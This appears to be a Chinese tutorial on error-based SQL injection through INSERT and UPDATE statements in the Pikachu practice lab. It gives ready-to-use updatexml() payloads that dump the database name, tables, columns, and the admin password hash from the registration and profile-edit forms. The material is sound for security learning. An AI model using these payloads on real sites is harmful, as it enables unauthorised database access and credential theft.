SQL注入-基于insert/update利用案例
sql语句正常插入表中的数据
insert into member(username,pw,sex,phonenum,address,email) values('xiaoqiang',1111,1,2,3,4);
select * from member;
例如插入小强数据,如图所示:
采用or这个运算符,构造闭合语句
values('xiaoqiang' or or '',1111,1,2,3,4);
‘xiaoqinag’ or __ or 中后面的那个or后的单引号是为了闭合掉语句后面本身带有的单引号。而前面第一个or后是我们要填的注入语句。
这里还是用后台报错的方法来构造payload,且有必要提到的是,这里我们还用的了updatexmal()
基于insert语句下的报错:
暴库payload语句
xiaoqiang' or updatexml(1,concat(0x7e,database()),0) or '
爆出数据库:pikachu 如图所示:
基于insert利用案例(与update是一样的)
通过前端网页进行测试,点击insert注入->注册,必填项输入单引号,看后台会执行报错不
发现被后台数据执行,返回报错信息sql语句错误
输入payload爆库语句进行测试,查看结果
xiaoqiang' or updatexml(1,concat(0x7e,database()),0) or '
发现数据库已经显示pikachu
输入payload爆表名称语句,也是要加limit参数,一次一次的去测试
xiaoqiang' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1)),0) or '
发现表名称为users比较敏感
根据已知的表名进行爆列字段的payload语句,一次一次进行测试
xiaoqiang' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1)),0) or '
爆出字段用户名username
爆出字段密码:password
爆出用户名和密码的payload语句
xiaoqiang' or updatexml(1,concat(0x7e,(select username from users limit 0,1)),0) or '
发现高级用户admin
根据已知的表名,用户名,进行爆出密码的payload语句
xiaoqiang' or updatexml(1,concat(0x7e,(select password from users where username='admin' limit 0,1)),0) or '
爆出md5值密码,被加密了,可以进行解密,即可;
基于update利用案例(与insert是一样的)
例如:还是用暴库语句,基于报错:
xiaoqiang’ or updatexml(1,concat(0x7e,database()),0) or ’
登录lucy的账号,进行修改数据,输入payload语句进行暴库
如果所示,库名被暴漏出来,接下来同上一样的操作,这里就不演示了;
